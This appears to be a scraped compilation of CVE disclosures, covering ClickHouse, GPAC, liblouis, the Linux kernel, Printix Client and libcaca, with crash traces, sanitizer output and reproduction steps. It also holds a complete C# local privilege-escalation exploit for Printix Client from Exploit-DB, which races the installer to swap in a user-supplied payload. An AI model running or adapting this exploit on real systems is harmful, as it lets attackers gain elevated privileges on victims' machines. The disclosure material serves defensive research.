In most of the cases the modulo operation in Intel x86-64 is performed by a DIV instruction, which, apart from dividing the numbers, also keeps the remainder in a register. So in case bytes\_size is 0, it will end up dividing by zero.

These vulnerabilities were found by “smart fuzzing” the decompression mechanism. Smart fuzzing leverages the knowledge of the input format for generating input data which (relatively) adheres to the expected protocol schema, instead of completely random data.

**Fixes and Workarounds**

In order to fix the issues, update ClickHouse to the v21.10.2.15-stable version or later.

If upgrading is not possible, add firewall rules in the server that will restrict the access to the web port (8123) and the TCP server’s port (9000) to specific clients only.

**Are JFrog products vulnerable?**

JFrog products are not vulnerable to this issue, since they do not use the ClickHouse DBMS

**Acknowledgement**

We would like to thank the ClickHouse Inc. team for promptly and professionally handling this issue.

**Learn More**

In addition to exposing new security vulnerabilities and threats, JFrog provides developers and security teams easy access to the latest relevant information for their software with automated security scanning. Explore how JFrog Xray can be of help to you.

_Questions? Thoughts?_ Contact us at **research@jfrog.com** for any inquiries.

CVE-2021-43305: 7 RCE and DoS vulnerabilities Found in ClickHouse DBMS

GPAC 1.0.1 is affected by a NULL pointer dereference in gf_utf8_wcslen. (gf_utf8_wcslen is a renamed Unicode utf8_wcslen function.)

**Description**

Null Pointer Dereference in gf\_utf8\_wcslen ()

**Proof of Concept**

POC is here.

**bt**

    Program received signal SIGSEGV, Segmentation fault.
    [----------------------------------registers-----------------------------------]
    RAX: 0x24 ('$')
    RBX: 0x5555555e2870 --> 0x5555555e2840 --> 0x2000000020000000 ('')
    RCX: 0x0 
    RDX: 0x7ffff697e740 (0x00007ffff697e740)
    RSI: 0x0 
    RDI: 0x0 
    RBP: 0x2 
    RSP: 0x7fffffff7ff8 --> 0x7ffff78f7d71 (<xtra_box_dump+129>:    lea    ebx,[rax*4+0x0])
    RIP: 0x7ffff77ac884 (<gf_utf8_wcslen+4>:    cmp    WORD PTR [rdi],0x0)
    R8 : 0x0 
    R9 : 0x24 ('$')
    R10: 0x7ffff7e0cbc7 --> 0x22 ('"')
    R11: 0x7fffffff7ec7 --> 0x58c47a4e82a90030 
    R12: 0x5555555db220 --> 0x7ffffbad2c84 
    R13: 0x5555555e2920 --> 0x58747261 ('artX')
    R14: 0x5555555e28a0 --> 0x0 
    R15: 0x7ffff7e71725 --> 0x2020200058323025 ('%02X')
    EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
    [-------------------------------------code-------------------------------------]
       0x7ffff77ac874:  data16 nop WORD PTR cs:[rax+rax*1+0x0]
       0x7ffff77ac87f:  nop
       0x7ffff77ac880 <gf_utf8_wcslen>: endbr64 
    => 0x7ffff77ac884 <gf_utf8_wcslen+4>:   cmp    WORD PTR [rdi],0x0
       0x7ffff77ac888 <gf_utf8_wcslen+8>:   je     0x7ffff77ac8a8 <gf_utf8_wcslen+40>
       0x7ffff77ac88a <gf_utf8_wcslen+10>:  mov    rax,rdi
       0x7ffff77ac88d <gf_utf8_wcslen+13>:  nop    DWORD PTR [rax]
       0x7ffff77ac890 <gf_utf8_wcslen+16>:  add    rax,0x2
    [------------------------------------stack-------------------------------------]
    0000| 0x7fffffff7ff8 --> 0x7ffff78f7d71 (<xtra_box_dump+129>:   lea    ebx,[rax*4+0x0])
    0008| 0x7fffffff8000 --> 0x5555555db650 --> 0x73747473 ('stts')
    0016| 0x7fffffff8008 --> 0x2 
    0024| 0x7fffffff8010 --> 0x0 
    0032| 0x7fffffff8018 --> 0x6458c47a4e82a900 
    0040| 0x7fffffff8020 --> 0x5555555db220 --> 0x7ffffbad2c84 
    0048| 0x7fffffff8028 --> 0x5555555da950 --> 0x0 
    0056| 0x7fffffff8030 --> 0x5555555e2920 --> 0x58747261 ('artX')
    [------------------------------------------------------------------------------]
    Legend: code, data, rodata, value
    Stopped reason: SIGSEGV
    0x00007ffff77ac884 in gf_utf8_wcslen () from /home/zxq/CVE_testing/source/gpac/bin/gcc/libgpac.so.10
    gdb-peda$ bt
    #0  0x00007ffff77ac884 in gf_utf8_wcslen () from /home/zxq/CVE_testing/source/gpac/bin/gcc/libgpac.so.10
    #1  0x00007ffff78f7d71 in xtra_box_dump () from /home/zxq/CVE_testing/source/gpac/bin/gcc/libgpac.so.10
    #2  0x00007ffff78fa5f2 in gf_isom_box_dump () from /home/zxq/CVE_testing/source/gpac/bin/gcc/libgpac.so.10
    #3  0x00007ffff78e99f6 in gf_isom_dump () from /home/zxq/CVE_testing/source/gpac/bin/gcc/libgpac.so.10
    #4  0x0000555555588c15 in dump_isom_xml ()
    #5  0x000055555557c564 in mp4boxMain ()
    #6  0x00007ffff74dc0b3 in __libc_start_main (main=0x55555556d420 <main>, argc=0x5, argv=0x7fffffffe328, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe318)
        at ../csu/libc-start.c:308
    #7  0x000055555556d45e in _start ()
    
    

**Impact**

This vulnerability is capable of crashing software, Bypass Protection Mechanism, Modify Memory, and possible remote execution.

CVE-2022-24577: NULL Pointer Dereference in gpac

Liblouis through 3.21.0 has a buffer overflow in compilePassOpcode in compileTranslationTable.c (called, indirectly, by tools/lou_checktable.c).

**Describe the bug**  
There is a global-buffer-overflow bug found in compilePassOpcode, can be triggered via lou\_checktable+ ASan

**To Reproduce**  
Steps to reproduce the behavior:

    export CC=clang && export CFLAGS="-fsanitize=address -g"
    ./autogen.sh && ./configure --disable-shared --disable-local-libopts && make clean && make -j8
    ./tools/lou_checktable  POC
    
    

Output:

    ==17764==ERROR: AddressSanitizer: global-buffer-overflow on address 0x00000102f062 at pc 0x00000051d4ce bp 0x7ffdfad96390 sp 0x7ffdfad96388
    WRITE of size 2 at 0x00000102f062 thread T0
        #0 0x51d4cd in compilePassOpcode /benchmark/vulnerable/liblouis/liblouis/compileTranslationTable.c:1896:31
        #1 0x50f7bf in compileRule /benchmark/vulnerable/liblouis/liblouis/compileTranslationTable.c:3947:11
        #2 0x4ff42b in compileFile /benchmark/vulnerable/liblouis/liblouis/compileTranslationTable.c:4660:9
        #3 0x4fbbe9 in compileTable /benchmark/vulnerable/liblouis/liblouis/compileTranslationTable.c:4767:9
        #4 0x4f9bdf in getTable /benchmark/vulnerable/liblouis/liblouis/compileTranslationTable.c:4939:7
        #5 0x4f9061 in _lou_getTable /benchmark/vulnerable/liblouis/liblouis/compileTranslationTable.c:4848:2
        #6 0x4fb51f in lou_getTable /benchmark/vulnerable/liblouis/liblouis/compileTranslationTable.c:4860:2
        #7 0x4f4109 in main /benchmark/vulnerable/liblouis/tools/lou_checktable.c:114:16
        #8 0x7f6ff64f0bf6 in __libc_start_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310
        #9 0x41b699 in _start (/benchmark/vulnerable/liblouis/tools/lou_checktable+0x41b699)
    
    0x00000102f062 is located 0 bytes to the right of global variable 'passRuleDots' defined in 'compileTranslationTable.c:1850:21' (0x102e060) of size 4098
    SUMMARY: AddressSanitizer: global-buffer-overflow /benchmark/vulnerable/liblouis/liblouis/compileTranslationTable.c:1896:31 in compilePassOpcode
    Shadow bytes around the buggy address:
      0x0000801fddb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0000801fddc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0000801fddd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0000801fdde0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0000801fddf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x0000801fde00: 00 00 00 00 00 00 00 00 00 00 00 00[02]f9 f9 f9
      0x0000801fde10: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
      0x0000801fde20: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
      0x0000801fde30: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
      0x0000801fde40: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
      0x0000801fde50: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==17764==ABORTING
    

**System**

OS: Ubuntu  
OS version : can be reproduced in 18.04/20.04  
clang version: 12.0.1 (release/12.x)  
liblouis Version : latest commit 4d73c81

**Credit**  
NCNIPC of China  
Hexhive

**POC**  
POC.zip

CVE-2022-26981: [BUG] global-buffer-overflow in lou_checktable · Issue #1171 · liblouis/liblouis

An issue was discovered in the Linux kernel before 5.16.12. drivers/net/usb/sr9700.c allows attackers to obtain sensitive information from heap memory via crafted frame lengths from a device.

CVE-2022-26966

Printix Secure Cloud Print Management through 1.3.1106.0 creates a temporary temp.ini file in a directory with insecure permissions, leading to privilege escalation because of a race condition.

    # Exploit Title: Printix Client 1.3.1106.0 - Privilege Escalation
    # Date: 3/2/2022
    # Exploit Author: Logan Latvala
    # Vendor Homepage: https://printix.net
    # Software Link:
    https://software.printix.net/client/win/1.3.1106.0/PrintixClientWindows.zip
    # Version: <= 1.3.1106.0
    # Tested on: Windows 7, Windows 8, Windows 10, Windows 11
    # CVE : CVE-2022-25090
    # Github for project: https://github.com/ComparedArray/printix-CVE-2022-25090
    
    using System;
    using System.Runtime.InteropServices;
    using System.Drawing;
    
    using System.Reflection;
    using System.Threading;
    using System.IO;
    using System.Text;
    using System.Resources;
    using System.Diagnostics;
    
    //Assembly COM for transparent creation of the application.
    
    //End of Assembly COM For Transparent Creation usage.
    public class Program
    {
    	//Initiator class for the program, the program starts on the main method.
    	public static void Main(string[] args)
    	{
    		//Console.SetWindowSize(120,30);
    		//Console.SetBufferSize(120,30);
    		Console.ForegroundColor = ConsoleColor.Blue;
    		Console.WriteLine("┌─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────");
    		Console.WriteLine("├			  oo dP                           dP                                ");
    		Console.ForegroundColor = ConsoleColor.Red;
    		Console.WriteLine("├			     88                           88                                ");
    		Console.ForegroundColor = ConsoleColor.Green;
    		Console.WriteLine("├			  dP 88d888b. .d8888b. d888888b d8888P .d8888b. 88d8b.d8b. 88d888b. ");
    		Console.ForegroundColor = ConsoleColor.Blue;
    		Console.WriteLine("├			  88 88'  `88 88'  `88    .d8P'   88   88ooood8 88'`88'`88 88'  `88 ");
    		Console.ForegroundColor = ConsoleColor.Yellow;
    		Console.WriteLine("├			  88 88    88 88.  .88  .Y8P      88   88.  ... 88  88  88 88.  .88 ");
    		Console.ForegroundColor = ConsoleColor.Magenta;
    		Console.WriteLine("├			  dP dP    dP `88888P8 d888888P   dP   `88888P' dP  dP  dP 88Y888P' ");
    		Console.WriteLine("├			                                                           88       ");
    		Console.WriteLine("├			                                                           dP       ");
    		Console.ForegroundColor = ConsoleColor.Blue;
    		Console.Write("├			                        For ");
    		Console.ForegroundColor = ConsoleColor.Magenta;
    		Console.Write("Printix ");
    		Console.ForegroundColor = ConsoleColor.Blue;
    		Console.Write("Services                       Designed By Logan Latvala\n");
    		Console.WriteLine("└─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────");
    		Thread.Sleep(3000);
    		string filesH = "";
    		Console.WriteLine("Drag and drop a payload onto this application for execution.");
    		try
    		{
    			if (args[0]?.Length >0)
    			{
    				Console.WriteLine("File Added: " + args[0]);
    			}
    			
    		}
    		catch (Exception e)
    		{
    			Console.WriteLine("You\'re missing a file here, please ensure that you drag and drop a payload to execute.\n \n We'll print the error for you right here...\n \n");
    			Console.ForegroundColor = ConsoleColor.Red;
    			Console.WriteLine(e);
    			Console.ReadLine();
    			Environment.Exit(40);
    		}
    
    
    		Console.WriteLine("\n We're going to look for your printix installer, one moment...");
    		string[] installerSearch = Directory.GetFiles(@"C:\windows\installer\", "*.msi", SearchOption.AllDirectories);
    
    		double mCheck = 1.00;
    
    		string trueInstaller = "";
    		//Starts to enumerate window's installer directory for an author with the name of printix.
    		foreach (string path in installerSearch)
    		{
    			Console.WriteLine("Searching Files: {0} / {1} Files", mCheck, installerSearch.Length);
    			Console.WriteLine("Searching Files... " + (Math.Round((mCheck / installerSearch.Length) * 100)) + "% Done.");
    			if (readFileProperties(path, "Printix"))
    			{
    				trueInstaller = path;
    				Console.WriteLine("We've found your installer, we'll finish enumeration.");
    				goto MGMA;
    			}
    			mCheck++;
    		}
    	//Flag for enumeration when the loop needs to exit, since it shouldn't loop infinitely.
    	MGMA:
    		if (trueInstaller == "")
    		{
    			Console.WriteLine("We can't find your installer, you are not vulnerable.");
    			Thread.Sleep(2000);
    			Environment.Exit(12);
    		}
    		Console.WriteLine("├─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────");
    		Console.WriteLine("├ We are starting to enumerate your temporary directory.");
    		Console.WriteLine("├─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────");
    
    		//Start a new thread here for enumeration.
    
    		Thread t = new Thread(() => newTempThread(filesH, args));
    		t.Start();
    
    
    
    		Process.Start(trueInstaller);
    
    
    
    		Console.WriteLine("All done.");
    		Console.ReadLine();
    	}
    	public static void newTempThread(string filesH, string[] args)
    	{
    		while (true)
    		{
    			try
    			{
    				//Starts the inheriting process for printix, in which scans for the files and relays their contents.
    				string[] files = Directory.GetFiles(@"C:\Users\" + Environment.UserName + @"\AppData\Local\Temp\", "msiwrapper.ini", SearchOption.AllDirectories);
    				if (!string.IsNullOrEmpty(files[0]))
    				{
    					foreach (string fl in files)
    					{
    						if (!filesH.Contains(fl))
    						{
    
    							//filesH += " " + fl;
    							string[] fileText = File.ReadAllLines(fl);
    							int linerc = 0;
    							foreach (string liners in fileText)
    							{
    
    								if (liners.Contains("SetupFileName"))
    								{
    
    									//Most likely the temporary directory for setup, which presents it properly.
    									Console.WriteLine("├─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────");
    									Console.WriteLine("├ " + fl);
    									fileText[linerc] = @"SetupFileName=" + "\"" + args[0] + "\"";
    									Console.WriteLine("├ " + fileText[linerc] + "");
    									Console.WriteLine("├─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────");
    									Console.WriteLine("│");
    									filesH += " " + fl;
    
    									File.WriteAllText(fl, string.Empty);
    									File.WriteAllLines(fl, fileText);
    								}
    								linerc++;
    							}
    						}
    					}
    				}
    			}
    			catch (Exception e) { Console.WriteLine("There was an error, try re-running the program. \n" + e); Console.ReadLine(); }
    
    			Thread.Sleep(20);
    		}
    	}
    	public static bool readFileProperties(string file, string filter)
    	{
    		System.Diagnostics.Process process = new System.Diagnostics.Process();
    		System.Diagnostics.ProcessStartInfo startInfo = new System.Diagnostics.ProcessStartInfo();
    		startInfo.UseShellExecute = false;
    		startInfo.RedirectStandardOutput = true;
    		startInfo.FileName = "CMD.exe";
    		startInfo.Arguments = "/c PowerShell -Command \"$FilePath='" + file + "'; Write-Host ((New-Object -COMObject Shell.Application).NameSpace((Split-Path -Parent -Path $FilePath))).ParseName((Split-Path -Leaf -Path $FilePath)).ExtendedProperty('System.Author')\"";
    		process.StartInfo = startInfo;
    		process.Start();
    		string output = process.StandardOutput.ReadToEnd();
    		process.WaitForExit();
    		if (output.Contains(filter)) { return true; }
    		else { return false; }
    		//wmic datafile where Name="F:\\ekojs.txt" get Description,Path,Status,Version
    	}
    }

CVE-2022-25090: Offensive Security’s Exploit Database Archive

libcaca is affected by a Divide By Zero issue via img2txt, which allows a remote malicious user to cause a Denial of Service

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open

kdsjZh opened this issue

Feb 24, 2022

· 3 comments

Open

**\[BUG\] Divide by zero in img2txt #65**

kdsjZh opened this issue

Feb 24, 2022

· 3 comments

**Comments**

version: latest commit f42aa68  
driver: src/img2txt  
Environment: ubuntu 22.04, clang-12  
step to reproduce:

    export CFLAGS="-fsanitize=address -g"
    export CC=clang
    ./bootstrap
    ./configure 
    make -j8
    ./src/img2txt ./divide_by_0.seed
    

Sanitizer output:

    AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==25214==ERROR: AddressSanitizer: FPE on unknown address 0x0000004d0433 (pc 0x0000004d0433 bp 0x7fff1cb39010 sp 0x7fff1cb38ee0 T0)
        #0 0x4d0433 in main /benchmarks/libcaca/src/img2txt.c:183:42
        #1 0x7fa2270f9d8f  (/lib/x86_64-linux-gnu/libc.so.6+0x2dd8f)
        #2 0x7fa2270f9e3f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2de3f)
        #3 0x421944 in _start (/benchmarks/libcaca/src/img2txt+0x421944)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: FPE /benchmarks/libcaca/src/img2txt.c:183:42 in main
    ==25214==ABORTING
    
    

#POC  
divide\_by\_0.zip

##Credit  
Han Zheng  
NCNIPC of China  
Hexhive

Thank you, reading the code it could happen when given a valid image of width 0 (probably the case here), but also with any image if passing -y 0.

How's this going to be fixed?  
I added a check for i->w and/or i->h being 0, issuing an error message ("image size is 0") and setting lines and cols to 0 (caca_set_canvas_size can handle this).  
Obviously caca_export_canvas_to_memory then chokes on this but this is handled already. I only then also changed the format in the error message to format?format:"ansi".

Tag

#c++